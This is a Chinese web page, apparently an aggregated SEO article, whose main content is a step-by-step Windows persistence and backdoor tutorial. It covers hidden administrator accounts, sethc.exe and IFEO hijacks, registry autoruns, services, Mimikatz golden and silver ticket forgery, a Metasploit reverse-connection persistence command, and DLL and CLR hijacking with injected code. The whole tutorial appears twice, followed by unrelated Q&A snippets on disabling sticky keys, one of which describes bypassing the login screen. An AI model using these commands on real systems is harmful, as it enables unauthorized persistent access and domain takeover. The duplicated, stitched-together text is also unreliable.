windows粘滞键程序
供稿:hz-xin.com 日期:2025-01-13
windows粘滞键程序(Windows 粘滞键)一、影子账户
1.使用如下命令创建隐藏用户并加入管理员组
netusertest$123456/addnetlocalgroupadministratorstest$/add创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏。
2.打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM)
修改SAM权限,赋予adminitrators完全控制权限。
3.将Administrator用户对应项的F数据值复制到test$用户对应项的F数据值。
4.将test$和所对应项000003F1导出,分别命名为test.reg和1.reg
5.删除test$用户,将test.reg和1.reg导入注册表
netusertest$/delregedit/stest.regregedit/s1.reg
6.此时在用户组已经看不到test$用户,只能在注册表中能看到。
二、粘滞键后门
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。一般的电脑连按五次shift会出现粘滞键提示。
演示:
粘滞键位置:c:\windows\system32\sethc.exe
命令:movesethc.exesethc1.execopycmd.exesethc.exe此时连按五次shift键即可启动cmd,而且不需要登录就可以执行。
三、logon scripts后门
Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。
演示:
注册表位置:HKEY_CURRENT_USER\Environment
REGADD"HKEY_CURRENT_USER\Environment"/vUserInitMprLogonScript/tREG_SZ/d"C:\666.exe"#创建键为:UserInitMprLogonScript,其键值为我们要启动的程序路径重启,上线成功。
四、映像劫持
“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。
演示:
注册表位置:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
在此注册表位置添加项sethc.exe,添加debugger键的值为c:\windows\system32\cmd.exe
regadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe"/v"Debugger"/tREG_SZ/d"c:\windows\system32\cmd.exe"/f此时点击五次shift键会打开cmd。
五、注册表自启动后门
位置一:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
添加键test,值为后门程序路径。
REGADD"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/vtest1/tREG_SZ/d"C:\666.exe"重新启动会自动运行后门程序。
位置二:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
修改键Userinit的值,重启就会自动运行程序。
六、屏幕保护程序后门
屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件扩展名的可执行文件,并通过scrnsave.scr实用程序执行。
演示:
注册表位置:HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE为默认的屏保程序,我们可将此键值设置为我们要利用的恶意程序。在本质上,.scr文件是可执行文件。ScreenSaveActive表示屏保状态,1为启动,0为关闭。ScreenSaverTimeout表示屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)。ScreenSaverIsSecure默认参数为0,标识不需要密码即可解锁。修改SCRASAVE.EXE的值为后门程序路径,等待屏保时间自动运行。
regadd"HKEY_CURRENT_USER\ControlPanel\Desktop"/vSCRNSAVE.EXE/tREG_SZ/d"c:\666.exe"/f七、计划任务后门
schtasks命令设定计划自动启动后门程序。
schtasks/Create/tnUpdater/trc:\666.exe/scminute/mo5#每5分钟自动执行666.exe八、服务自启动后门
自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以将dll文件注册为服务。
演示:
sccreatetestbinpath=c:\666.exe(注意等号后面有空格)#创建服务scconfigteststart=auto#设置服务为自动启动netstarttest#启动服务九、黄金票据
在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
演示:
利用条件:1.域sid2.域名称3.krbtgtntlmhash或aes256值未注入票据访问域控被拒绝。
查看krbtgtntlmhash:lsadump::dcsync/domain:/user:krbtgt清空票据信息:kerberos::purge生成票据:kerberos::golden/admin:/domain:/sid:/krbtgt:/ticket:导入票据:kerberos::pttAdministrator.kiribi票据注入成功。
十、白银票据
黄金票据伪造的TGT,那么白银票据伪造的是ST。在Kerberos认证的第三步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,伪造的门票只对部分服务起作用。
白银票据常用服务:
Service Type
Service Silver Tickets
WMI
HOST RPCSS
PowerShell Remoting
HOST HTTP
WinRM
HOST HTTP
Scheduled Tasks
HOST
Windows File Share (CIFS)
CIFS
LDAP operations includingMimikatz DCSync
LDAP
Windows Remote Server Administration Tools
RPCSS LDAP CIFS
利用条件:1.目标服务器全域名2.域sid3.可利用的服务4.服务账号的ntlmhash演示-伪造CIFS权限:
CIFS用于主机之间文件共享。
生成票据:kerberos::golden/domain:/sid:/target:/service:/rc4:/user:/ptt此时就可以访问目标机器的共享目录了。
十一、组策略设置脚本启动
1.首先创建一个脚本,此处为添加隐藏用户,内容如下:
@echooffnetusertest$Test123456./addnetlocalgroupadministratorstest$/addexit2.打开组策略配置脚本(启动/关机),添加脚本,关机就会自动执行脚本。
十二、bitsadmin
BITS (后台智能传送服务) 是一个 Windows 组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。
常用命令:bitsadmin/create[type]DisplayName//创建一个任务bitsadmin/cancel//删除一个任务bitsadmin/list/allusers/verbose//列出所有任务bitsadmin/AddFile//给任务test添加一个下载文件bitsadmin/SetNotifyCmdLine[ProgramParameters]//设置在任务完成传输时或任务进入状态时将运行的命令行命令。bitsadmin/Resume//激活传输队列中的新任务或挂起的任务。bitsadmin/cancel//删除某个任务bitsadmin/reset/allusers//删除所有任务bitsadmin/complete//完成某个任务演示:电脑
bitsadmin/createtest//创建任务testbitsadmin/addfiletestc:\windows\system32\calc.exec:\Users\ndsec\Desktop\calc.exebitsadmin/SetNotifyCmdLinetestcmd.exe"cmd.exe/ccalc.exe"bitsadmin/resumetest电脑
十三、msf persistence后门
使用persistence模块创建后门。
参数:-A自动启动匹配的exploit/multi/handler连接到代理-L目标主机中要写入有效负载的位置,如果没有,将使用%TEMP%。-P要使用的有效负载,默认为windows/meterpreter/reverse_tcp。-S在启动时自动启动代理作为服务(具有SYSTEM权限)-T要使用的备用可执行模板-U用户登录时自动启动代理-X系统启动时自动启动代理-h帮助菜单-i每次连接尝试之间的时间间隔(以秒为单位)-p运行Metasploit的系统正在监听的端口-r运行Metasploit的系统的IP监听连接执行如下命令,在目标机创建一个vbs后门,每5秒进行回连:
runpersistence-S-U-X-i5-p55555-r192.168.1.128电脑
监听55555端口,成功上线。
十四、DLL劫持
DLL(Dynamic Link Library)文件为动态链接库文件,又称”应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。
dll加载顺序:
Windowsxpsp2之前:1.进程对应的应用程序所在目录;2.当前目录(CurrentDirectory);3.系统目录(通过GetSystemDirectory获取);4.16位系统目录;5.电脑Windows目录(通过GetWindowsDirectory获取);6.PATH环境变量中的各个目录;Windowsxpsp2之后:Windows查找DLL的目录以及对应的顺序(SafeDllSearchMode默认会被开启):默认注册表为:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode,其键值为11.进程对应的应用程序所在目录(可理解为程序安装目录比如C:\ProgramFiles\uTorrent)2.系统目录(即%windir%system32);3.16位系统目录(即%windir%system);4.Windows目录(即%windir%);5.当前目录(运行的某个文件所在目录,比如C:\DocumentsandSettings\Administrator\Desktop\test);6.PATH环境变量中的各个目录;win7以上版本:系统没有了SafeDllSearchMode而采用KnownDLLs,那么凡是此项下的DLL文件就会被禁止从exe自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用,其注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs演示-劫持极速pdf阅读器:
1.使用process explorer分析可以劫持的dll文件,劫持sqlite3.dll
电脑
2.使用ahaeadlib将sqlite3.dll转为cpp文件
3.使用visual studio打开cpp文件插入要执行的后门代码,并生成新的dll文件
STARTUPINFOsi={sizeof(si)};PROCESS_INFORMATIONpi;CreateProcess(TEXT("C:\\666.exe"),NULL,NULL,NULL,false,0,NULL,NULL,&si,&pi);4.将新的dll文件改名为sqlite3.dll,将旧的sqlite3.dll改为sqlite3Org.dll
5.打开极速pdf阅读器后成功上线
十五、CLR劫持
CLR全称Common Language Runtime,中文名称为公共语言运行时。CLR是.NETFramework的主要执行引擎,作用之一是监视程序的运行。可以理解成,让系统在执行.NET程序的时候先执行一个你指定的dll文件。
1.修改注册表:HKEY_CURRENT_USER\Software\Classes\CLSID\
REGADD"HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1234-1234-1234-111111111111}\InProcServer32"/VE/TREG_SZ/D"C:\test.dll"/FREGADD"HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1234-1234-1234-111111111111}\InProcServer32"/VThreadingModel/TREG_SZ/DApartment/F2.配置全局环境变量,不然只在当前cmd窗口劫持.net程序,然后直接执行powershell即可上线。
SETXCOR_ENABLE_PROFILING1/MSETXCOR_PROFILER{11111111-1234-1234-1234-111111111111}/M参考链接:
1.https://www.jianshu.com/p/4936da524040
2.https://hackergu.com/power-clr-thief/
3.https://cloud.tencent.com/developer/article/1850726
4.https://xz.aliyun.com/t/6461
5.https://cloud.tencent.com/developer/article/178286
电脑
1.使用如下命令创建隐藏用户并加入管理员组
netusertest$123456/addnetlocalgroupadministratorstest$/add创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏。
2.打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM)
修改SAM权限,赋予adminitrators完全控制权限。
3.将Administrator用户对应项的F数据值复制到test$用户对应项的F数据值。
4.将test$和所对应项000003F1导出,分别命名为test.reg和1.reg
5.删除test$用户,将test.reg和1.reg导入注册表
netusertest$/delregedit/stest.regregedit/s1.reg
6.此时在用户组已经看不到test$用户,只能在注册表中能看到。
二、粘滞键后门
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。一般的电脑连按五次shift会出现粘滞键提示。
演示:
粘滞键位置:c:\windows\system32\sethc.exe
命令:movesethc.exesethc1.execopycmd.exesethc.exe此时连按五次shift键即可启动cmd,而且不需要登录就可以执行。
三、logon scripts后门
Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。
演示:
注册表位置:HKEY_CURRENT_USER\Environment
REGADD"HKEY_CURRENT_USER\Environment"/vUserInitMprLogonScript/tREG_SZ/d"C:\666.exe"#创建键为:UserInitMprLogonScript,其键值为我们要启动的程序路径重启,上线成功。
四、映像劫持
“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。
演示:
注册表位置:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
在此注册表位置添加项sethc.exe,添加debugger键的值为c:\windows\system32\cmd.exe
regadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe"/v"Debugger"/tREG_SZ/d"c:\windows\system32\cmd.exe"/f此时点击五次shift键会打开cmd。
五、注册表自启动后门
位置一:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
添加键test,值为后门程序路径。
REGADD"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"/vtest1/tREG_SZ/d"C:\666.exe"重新启动会自动运行后门程序。
位置二:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
修改键Userinit的值,重启就会自动运行程序。
六、屏幕保护程序后门
屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件扩展名的可执行文件,并通过scrnsave.scr实用程序执行。
演示:
注册表位置:HKEY_CURRENT_USER\Control Panel\Desktop
SCRNSAVE.EXE为默认的屏保程序,我们可将此键值设置为我们要利用的恶意程序。在本质上,.scr文件是可执行文件。ScreenSaveActive表示屏保状态,1为启动,0为关闭。ScreenSaverTimeout表示屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)。ScreenSaverIsSecure默认参数为0,标识不需要密码即可解锁。修改SCRASAVE.EXE的值为后门程序路径,等待屏保时间自动运行。
regadd"HKEY_CURRENT_USER\ControlPanel\Desktop"/vSCRNSAVE.EXE/tREG_SZ/d"c:\666.exe"/f七、计划任务后门
schtasks命令设定计划自动启动后门程序。
schtasks/Create/tnUpdater/trc:\666.exe/scminute/mo5#每5分钟自动执行666.exe八、服务自启动后门
自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以将dll文件注册为服务。
演示:
sccreatetestbinpath=c:\666.exe(注意等号后面有空格)#创建服务scconfigteststart=auto#设置服务为自动启动netstarttest#启动服务九、黄金票据
在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
演示:
利用条件:1.域sid2.域名称3.krbtgtntlmhash或aes256值未注入票据访问域控被拒绝。
查看krbtgtntlmhash:lsadump::dcsync/domain:/user:krbtgt清空票据信息:kerberos::purge生成票据:kerberos::golden/admin:/domain:/sid:/krbtgt:/ticket:导入票据:kerberos::pttAdministrator.kiribi票据注入成功。
十、白银票据
黄金票据伪造的TGT,那么白银票据伪造的是ST。在Kerberos认证的第三步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,伪造的门票只对部分服务起作用。
白银票据常用服务:
Service Type
Service Silver Tickets
WMI
HOST RPCSS
PowerShell Remoting
HOST HTTP
WinRM
HOST HTTP
Scheduled Tasks
HOST
Windows File Share (CIFS)
CIFS
LDAP operations includingMimikatz DCSync
LDAP
Windows Remote Server Administration Tools
RPCSS LDAP CIFS
利用条件:1.目标服务器全域名2.域sid3.可利用的服务4.服务账号的ntlmhash演示-伪造CIFS权限:
CIFS用于主机之间文件共享。
生成票据:kerberos::golden/domain:/sid:/target:/service:/rc4:/user:/ptt此时就可以访问目标机器的共享目录了。
十一、组策略设置脚本启动
1.首先创建一个脚本,此处为添加隐藏用户,内容如下:
@echooffnetusertest$Test123456./addnetlocalgroupadministratorstest$/addexit2.打开组策略配置脚本(启动/关机),添加脚本,关机就会自动执行脚本。
十二、bitsadmin
BITS (后台智能传送服务) 是一个 Windows 组件,它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。
常用命令:bitsadmin/create[type]DisplayName//创建一个任务bitsadmin/cancel//删除一个任务bitsadmin/list/allusers/verbose//列出所有任务bitsadmin/AddFile//给任务test添加一个下载文件bitsadmin/SetNotifyCmdLine[ProgramParameters]//设置在任务完成传输时或任务进入状态时将运行的命令行命令。bitsadmin/Resume//激活传输队列中的新任务或挂起的任务。bitsadmin/cancel//删除某个任务bitsadmin/reset/allusers//删除所有任务bitsadmin/complete//完成某个任务演示:电脑
bitsadmin/createtest//创建任务testbitsadmin/addfiletestc:\windows\system32\calc.exec:\Users\ndsec\Desktop\calc.exebitsadmin/SetNotifyCmdLinetestcmd.exe"cmd.exe/ccalc.exe"bitsadmin/resumetest电脑
十三、msf persistence后门
使用persistence模块创建后门。
参数:-A自动启动匹配的exploit/multi/handler连接到代理-L目标主机中要写入有效负载的位置,如果没有,将使用%TEMP%。-P要使用的有效负载,默认为windows/meterpreter/reverse_tcp。-S在启动时自动启动代理作为服务(具有SYSTEM权限)-T要使用的备用可执行模板-U用户登录时自动启动代理-X系统启动时自动启动代理-h帮助菜单-i每次连接尝试之间的时间间隔(以秒为单位)-p运行Metasploit的系统正在监听的端口-r运行Metasploit的系统的IP监听连接执行如下命令,在目标机创建一个vbs后门,每5秒进行回连:
runpersistence-S-U-X-i5-p55555-r192.168.1.128电脑
监听55555端口,成功上线。
十四、DLL劫持
DLL(Dynamic Link Library)文件为动态链接库文件,又称”应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。
dll加载顺序:
Windowsxpsp2之前:1.进程对应的应用程序所在目录;2.当前目录(CurrentDirectory);3.系统目录(通过GetSystemDirectory获取);4.16位系统目录;5.电脑Windows目录(通过GetWindowsDirectory获取);6.PATH环境变量中的各个目录;Windowsxpsp2之后:Windows查找DLL的目录以及对应的顺序(SafeDllSearchMode默认会被开启):默认注册表为:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode,其键值为11.进程对应的应用程序所在目录(可理解为程序安装目录比如C:\ProgramFiles\uTorrent)2.系统目录(即%windir%system32);3.16位系统目录(即%windir%system);4.Windows目录(即%windir%);5.当前目录(运行的某个文件所在目录,比如C:\DocumentsandSettings\Administrator\Desktop\test);6.PATH环境变量中的各个目录;win7以上版本:系统没有了SafeDllSearchMode而采用KnownDLLs,那么凡是此项下的DLL文件就会被禁止从exe自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用,其注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs演示-劫持极速pdf阅读器:
1.使用process explorer分析可以劫持的dll文件,劫持sqlite3.dll
电脑
2.使用ahaeadlib将sqlite3.dll转为cpp文件
3.使用visual studio打开cpp文件插入要执行的后门代码,并生成新的dll文件
STARTUPINFOsi={sizeof(si)};PROCESS_INFORMATIONpi;CreateProcess(TEXT("C:\\666.exe"),NULL,NULL,NULL,false,0,NULL,NULL,&si,&pi);4.将新的dll文件改名为sqlite3.dll,将旧的sqlite3.dll改为sqlite3Org.dll
5.打开极速pdf阅读器后成功上线
十五、CLR劫持
CLR全称Common Language Runtime,中文名称为公共语言运行时。CLR是.NETFramework的主要执行引擎,作用之一是监视程序的运行。可以理解成,让系统在执行.NET程序的时候先执行一个你指定的dll文件。
1.修改注册表:HKEY_CURRENT_USER\Software\Classes\CLSID\
REGADD"HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1234-1234-1234-111111111111}\InProcServer32"/VE/TREG_SZ/D"C:\test.dll"/FREGADD"HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1234-1234-1234-111111111111}\InProcServer32"/VThreadingModel/TREG_SZ/DApartment/F2.配置全局环境变量,不然只在当前cmd窗口劫持.net程序,然后直接执行powershell即可上线。
SETXCOR_ENABLE_PROFILING1/MSETXCOR_PROFILER{11111111-1234-1234-1234-111111111111}/M参考链接:
1.https://www.jianshu.com/p/4936da524040
2.https://hackergu.com/power-clr-thief/
3.https://cloud.tencent.com/developer/article/1850726
4.https://xz.aliyun.com/t/6461
5.https://cloud.tencent.com/developer/article/178286
电脑
windows粘滞键程序
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。一般的电脑连按五次shift会出现粘滞键提示。演示:粘滞键位置:c:\\windows\\system32\\sethc.exe命令:movesethc.exesethc1.execopycmd.exesethc.exe此时连按五次shift键即可启动cmd...
win10系统怎么打开粘滞键功能?
开始---设置---轻松使用---键盘中,使用粘滞键 设置为 开
粘滞键到底怎么用啊,什么叫一次按一个键
当快捷方式需要组合键时,例如 CTRL+P,粘滞键可以使您一次先按一个键,而不是同时按两个键。 Windows中的粘滞键是专为同时按下两个或多个键有困难的人设计的。粘滞键的主要功能是方便Shift、Ctrl、Alt与其他键的组合使用。在我们使用热键时,例如“CTRL+C”,用粘滞键就可以一次只按一个键来完成复制的功能。
粘滞键是什么怎么关闭?
开始耐烂岁---设置---轻伍埋松使用---键盘中,昌睁使用粘滞键 历手销吵 设置亏橘侍为关
windows7粘滞键怎么取消
用cmd.exe文件替换粘滞键程序,在系统登录界面按5次shift键,启动cmd程序添加用户 破解分析 该方法的变形有很多,在网上以前我也看过类似的,比如把放大镜程序替换为cmd等等,然后启动cmd命令行,添加一个用户然后登录进去,思路都是类似的。详细步骤 开电脑机时按F8让启动界面进入到这里(见下图)电脑 ...
怎么彻底取消粘滞键?
具体操作如下:1、点击开始按钮.找到"控制面板",点击进入;2.找到"轻松访问",点击进入;3.找到"使键盘更易于使用",点击进入;4.把启用粘滞键的勾取消即可。
电脑迟滞键怎么设置的
设置方法如下:1. 原理 在win7登录界面,连按5次Shift,则会弹出粘滞键提示。而此程序的路径位于c:\\windows\\system32路径下。可以将此程序的路径掉包成cmd,实现在登录界面弹出cmd命令行,重置登录密码实现登录。2. 利用 首先开启win7,在启动的过程中直接断电强制关机。然后再次启动,win7会出现一个...
谁知道粘滞键是怎么用?
粘滞键是专为同时按下多个键有困难的人而设计的。连按5次Shift键打开粘滞键功能后,可以让原本需要同时按下的快捷键,通过逐个按下每一个按键来实现。比如,我们通常需要两只手同时操作才能同时按下【Ctrl+Shift+Esc】打开任务管理器。可以连按5次Shift键启用粘滞键,按下回车键启用(或者按下Esc则...
windows11粘滞键怎么取消 windows11粘滞键关闭方法
但是这个功能却是单独给需要的人设计的,如果你不需要但是又不知道怎么关闭它,那么请接着看。windows11粘滞键关闭方法1.打开开始菜单,点击设置打开windows11设置界面。2.进入设置界面后选择辅助功能点击键盘选项。3.然后将【粘滞键】关闭即可。以上就是windows11粘滞键关闭方法,感谢持续关注本站!
Windows系统电脑中怎么禁用粘滞键功能
1. 方法1:第一步,打开电脑后,右键点击开始图标,然后点击弹出菜单中的设置选项。2. 方法2:也可以直接通过键盘,按WIN+I,打开Windows设置。2.禁用关闭粘滞键功能 1. 第二步,进入Windows设置页面后,点击下方的轻松使用选项。2. 第三步,来到轻松使用的界面后,点击左侧的键盘标签。3. 第四步...